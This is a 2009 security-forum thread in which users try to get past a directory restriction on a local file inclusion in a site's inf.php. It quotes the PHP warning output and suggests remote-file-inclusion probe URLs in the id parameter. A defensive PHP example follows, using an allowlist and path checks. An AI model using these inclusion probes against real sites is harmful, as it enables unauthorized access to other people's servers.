IT Security and Insecurity Portal

LFI dir restriction?

Posted: Fri Feb 06, 2009 10:15 pm
-AO-

URL:
Code:
Warning: include(./id/asdf.php) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\host\site.com\httpdocs\inf.php on line 48
Warning: include() [function.include]: Failed opening './id/asdf.php' for inclusion (include_path='.;./includes;./pear') in C:\Inetpub\host\site.com\httpdocs\inf.php on line 48
Restricted to dir /id? Is there a way to bypass this?

Re: LFI dir restriction?

Posted: Fri Feb 06, 2009 10:40 pm
tehhunter

-AO- wrote:
URL:
Code:
Warning: include(./id/asdf.php) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\host\site.com\httpdocs\inf.php on line 48
Warning: include() [function.include]: Failed opening './id/asdf.php' for inclusion (include_path='.;./includes;./pear') in C:\Inetpub\host\site.com\httpdocs\inf.php on line 48
Restricted to dir /id? Is there a way to bypass this?

It seems like the script just adds ('.php') on to the end of the script. You can try to redirect to a different website. Try these:
Code:
inf.php?id=http://www.php.net/index
inf.php?id=http://php.net/index
inf.php?id=www.php.net/index
inf.php?id=php.net/index
See if anything shows up in any of these queries.

Posted: Fri Feb 06, 2009 11:13 pm
-AO-

Quote:
inf.php?id=http://www.php.net/index
inf.php?id=http://php.net/index
inf.php?id=www.php.net/index
inf.php?id=php.net/index

These didn't work.
register_globals and url_include are probably off.

Posted: Sat Feb 07, 2009 8:56 am
pexli

This is Windows Server, dudes.

Posted: Sun Feb 08, 2009 12:17 am
-AO-

I set up a script vulnerable to inclusion on my Windows PC and it worked. What's the difference?
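
The thread never shows the source of inf.php; the warnings only reveal that the `id` parameter is placed between `./id/` and `.php` before `include()`, and that errors are displayed with the full server path. The following is an added example, not part of the thread and not the site's code, of one way to write that lookup so the request cannot choose the path. The names `PAGE_DIR`, `ALLOWED_PAGES` and `resolve_page`, the directory layout and the page names are assumptions.

```php
<?php
// Added example: PAGE_DIR, ALLOWED_PAGES and resolve_page are hypothetical names.

// Keep include() warnings, which disclose the full server path, out of the response.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

const PAGE_DIR = __DIR__ . DIRECTORY_SEPARATOR . 'id';   // assumed content directory
const ALLOWED_PAGES = ['about', 'contact', 'news'];      // constructed allowlist

/** Map a request value to a file inside PAGE_DIR, or null if it is not acceptable. */
function resolve_page($id): ?string
{
    // 1. Only exact, known page names pass. Arrays, URLs, traversal sequences
    //    and anything else not in the list are rejected outright.
    if (!is_string($id) || !in_array($id, ALLOWED_PAGES, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise the path and confirm the file really
    //    lives under PAGE_DIR (catches symlinks or a bad allowlist entry).
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . DIRECTORY_SEPARATOR . $id . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['id'] ?? 'about');
if ($page === null) {
    // Same generic response for every rejected value: no path, no PHP warning.
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

In php.ini, `allow_url_include = Off` (the default) stops `include()` from fetching `http://` paths at all, independently of this check.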